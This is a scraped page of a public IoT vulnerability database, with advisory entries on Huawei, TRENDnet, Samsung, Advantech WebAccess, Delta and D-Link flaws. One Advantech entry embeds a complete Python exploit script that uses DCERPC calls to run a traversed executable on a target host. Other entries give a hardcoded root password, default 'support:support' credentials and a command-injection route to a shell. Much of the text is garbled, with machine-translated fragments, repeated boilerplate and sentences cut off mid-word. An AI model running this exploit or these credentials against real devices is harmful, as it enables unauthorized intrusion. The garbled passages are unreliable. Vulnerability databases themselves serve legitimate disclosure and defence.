VARIoT IoT vulnerabilities database

The Huawei S7700 and S9700 are Huawei's intelligent routing switches. The HuaweiS7700 and S9700 denial of service vulnerability were caused by the device failing to fully verify the packet. An unauthenticated remote attacker can exploit the vulnerability by sending a very large message to the affected device.

Huawei DP300, RP200, TE30/40/50/60, TP3106/3206, and ViewPoint9030 are Huawei's integrated desktop telepresence products and high-definition video conferencing terminal products for high-end customers. A buffer overflow vulnerability exists in the CRYPTO module of several Huawei products. The vulnerability is due to the program not fully verifying the input. An unauthenticated local attacker exploiting the vulnerability by constructing a file containing parameters longer than the maximum value can cause the system to reboot.

Huawei AR series routers, DP300, NetEngine16EX and other Chinese Huawei products. A number of Huawei products have a null pointer reference vulnerability in the H323 protocol. The vulnerability is due to the failure of the H323 protocol to adequately verify packets. An attacker can send an attack to the device by sending a malformed message, which can cause the process to crash.

Huawei DP300, RP200, TE30/40/50/60, TP3106/3206, and ViewPoint9030 are Huawei's integrated desktop telepresence products and high-definition video conferencing terminal products for high-end customers. A buffer overflow vulnerability exists in the CRYPTO module of several Huawei products. The vulnerability is due to the program not fully verifying the input. An unauthenticated local attacker exploiting this vulnerability by constructing a file containing a null pointer with a parameter value can cause the system to reboot.

Huawei AR series routers, DP300, NetEngine16EX and other Chinese Huawei products. A resource management vulnerability exists in the H323 protocol of several Huawei products. The vulnerability is due to the failure of the H323 protocol to fully verify the packets. When the application fails, the attacker can send a malformed packet to the device to attack, which can cause the process to crash.

Huawei AR series routers, DP300, NetEngine16EX and other Chinese Huawei products. A cross-border read vulnerability exists in the H323 protocol of several Huawei products. The vulnerability is due to the failure of the H323 protocol to fully verify the message. An attacker can send an attack to a device by sending a packet with a special parameter, which can cause the process to crash.

Huawei AR series routers, DP300, NetEngine16EX and other Chinese Huawei products. A number of Huawei products have a null pointer reference vulnerability in the H323 protocol. The vulnerability is due to the failure of the H323 protocol to adequately verify packets. An attacker can send an attack to a device by sending a malformed packet, which can cause a memory leak and cause a denial of service attack.

Huawei DP300, RP200, TE30/40/50/60, and TP3106/3206 are Huawei's integrated desktop telepresence products and high-definition video conferencing terminal products for high-end customers. A memory leak vulnerability exists in several Huawei products because the program did not adequately verify the message. An unauthenticated remote attacker initiates a connection remotely through the SFTP/SSH protocol and sends a malformed message to the affected device, which can lead to memory leaks and a denial of service attack.

TRENDnet TEW-823DRU devices with firmware before 1.00b36 have a hardcoded password of kcodeskcodes for the root account, which makes it easier for remote attackers to obtain access via an FTP session. TRENDnet TEW-823DRU Device firmware contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TRENDnetTEW-823DRUdevices is a dual-band wireless router device from Trendlink (TRENDnet). A security vulnerability exists in the TRENDnetTEW-823DRU device using firmware prior to 1.00b36, which uses a hard-coded password

On Samsung mobile devices with N(7.x) software and Exynos chipsets, attackers can conduct a Trustlet stack overflow attack for arbitrary TEE code execution, in conjunction with a brute-force attack to discover unlock information (PIN, password, or pattern). The Samsung ID is SVE-2017-10733. Samsung Mobile device software contains a buffer error vulnerability. Vendors have confirmed this vulnerability SVE-2017-10733 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. AndroidL, M, and N are a set of Linux-based open source operating systems developed jointly by Google and the Open Handheld Device Alliance (OHA). Exynoschipsets is a processor designed and developed by Samsung in South Korea based on ARM architecture. An attacker could exploit the vulnerability to execute arbitrary code and obtain PIN, password, or mode information

On Samsung mobile devices with L(5.x), M(6.x), and N(7.x) software and Exynos chipsets, attackers can execute arbitrary code in the bootloader because S Boot omits a size check during a copy of ramfs data to memory. The Samsung ID is SVE-2017-10598. Samsung Mobile device software and Exynos The chipset contains a vulnerability related to input validation. Vendors have confirmed this vulnerability SVE-2017-10598 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Samsungmobiledevices is a smart mobile device produced by South Korea's Samsung. AndroidL, M, and N are a set of Linux-based open source operating systems developed jointly by Google and the Open Handheld Device Alliance (OHA). Exynoschipsets is a processor designed and developed by Samsung in South Korea based on ARM architecture. A security vulnerability exists in Samsung mobile devices using AndroidL (5.x), M (6.x) and N (7.x) and Exynos chips. The vulnerability stems from the failure of the program to detect size when copying ramfs data into memory. value. An attacker could exploit this vulnerability to execute arbitrary code in a boot load

A SQL Injection issue was discovered in WebAccess versions prior to 8.3. WebAccess does not properly sanitize its inputs for SQL commands. Advantech WebAccess Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within ChkAdminViewUsrPwd1, called from mailPg.asp. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code under the context of the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable

An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27e4 IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Multiple denial-of-service vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and obtain sensitive information

A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable

A Path Traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator. An attacker can leverage this vulnerability to delete files accessible to the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Multiple denial-of-service vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. #!/usr/bin/python2.7 # Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability # Date: 03-11-2018 # Exploit Author: Chris Lyne (@lynerc) # Vendor Homepage: www.advantech.com # Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe # Version: Advantech WebAccess 8.2-2017.08.18 # Tested on: Windows Server 2008 R2 Enterprise 64-bit # CVE : CVE-2017-16720 # See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/ import sys, struct from impacket import uuid from impacket.dcerpc.v5 import transport def call(dce, opcode, stubdata): dce.call(opcode, stubdata) res = -1 try: res = dce.recv() except Exception, e: print "Exception encountered..." + str(e) sys.exit(1) return res if len(sys.argv) != 2: print "Provide only host arg" sys.exit(1) port = 4592 interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc" version = "1.0" host = sys.argv[1] string_binding = "ncacn_ip_tcp:%s" % host trans = transport.DCERPCTransportFactory(string_binding) trans.set_dport(port) dce = trans.get_dce_rpc() dce.connect() print "Binding..." iid = uuid.uuidtup_to_bin((interface, version)) dce.bind(iid) print "...1" stubdata = struct.pack("<III", 0x00, 0xc351, 0x04) call(dce, 2, stubdata) print "...2" stubdata = struct.pack("<I", 0x02) res = call(dce, 4, stubdata) if res == -1: print "Something went wrong" sys.exit(1) res = struct.unpack("III", res) if (len(res) < 3): print "Received unexpected length value" sys.exit(1) print "...3" # ioctl 0x2711 stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204) command = "..\\..\\windows\\system32\\calc.exe" fmt = "<" + str(0x204) + "s" stubdata += struct.pack(fmt, command) call(dce, 1, stubdata) print "\nDid it work?" dce.disconnect()

A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation Screen Editor, Version 2.00.23.00 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dpb files may allow an attacker to remotely execute arbitrary code. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple denial-of-service vulnerabilities 3

A Type Confusion issue was discovered in Delta Electronics Delta Industrial Automation Screen Editor, Version 2.00.23.00 or prior. An access of resource using incompatible type ('type confusion') vulnerability may allow an attacker to execute remote code when processing specially crafted .dpb files. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple denial-of-service vulnerabilities 3

A Use-after-Free issue was discovered in Delta Electronics Delta Industrial Automation Screen Editor, Version 2.00.23.00 or prior. Specially crafted .dpb files could exploit a use-after-free vulnerability. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple denial-of-service vulnerabilities 3

An Out-of-bounds Write issue was discovered in Delta Electronics Delta Industrial Automation Screen Editor, Version 2.00.23.00 or prior. Specially crafted .dpb files may cause the system to write outside the intended buffer area. An attacker could exploit this vulnerability to execute arbitrary code (over boundary writes) with a specially crafted .dpb file. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple denial-of-service vulnerabilities 3

D-LinkDSL-6850U is a wireless router product of D-Link. D-LinkDSL-6850U Router Remote Command Execution Vulnerability. Since the router has the remote web management service enabled by default, the service has the default credentials support:support and cannot be disabled. The attacker can log in to the router's web management interface through the default credentials, and then manually open the Wan port telnet service that is turned off by default. After logging in to the telnet service, you can use the && or || command sandbox escape to get full shell permissions.